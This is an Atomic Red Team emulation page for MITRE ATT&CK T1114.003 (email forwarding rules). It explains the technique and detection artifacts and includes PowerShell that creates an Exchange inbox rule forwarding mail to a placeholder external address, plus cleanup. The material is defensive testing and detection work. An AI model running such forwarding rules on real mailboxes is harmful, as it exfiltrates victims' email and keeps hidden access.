# T1114.003 - Email Forwarding Rule
Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)

Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)

In some environments, administrators may be able to enable email forwarding rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to enable forwarding on all or specific mail an organization receives. 

## Atomic Tests

### Atomic Test #1 - Office365 - Email Forwarding
Creates a new Inbox Rule to forward emails to an external user via the "ForwardTo" property of the New-InboxRule Powershell cmdlet.

**Supported Platforms:** office-365

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: ExchangeOnlineManagement PowerShell module must be installed. Your user must also have an Exchange license. 

##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}

```
##### Get Prereq Commands:
```powershell
Install-Module -Name ExchangeOnlineManagement         
Import-Module ExchangeOnlineManagement

```

In [ ]:
Invoke-AtomicTest T1114.003 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
$secure_pwd = "None" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "None", $secure_pwd
Connect-ExchangeOnline -Credential $creds
New-InboxRule -Name "Atomic Red Team Email Rule" -ForwardTo "Atomic_Operator@fakeemail.aq"
```

In [ ]:
Invoke-AtomicTest T1114.003 -TestNumbers 1

#### Cleanup: 
```powershell
$secure_pwd = "None" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "None", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Get-InboxRule | Where-Object { $_.Name -eq "Atomic Red Team Email Rule" | ForEach-Object { Remove-InboxRule -Identity $_.Identity -Force -Confirm:$False }
```

In [ ]:
Invoke-AtomicTest T1114.003 -TestNumbers 1 -Cleanup

## Detection
Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)

Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.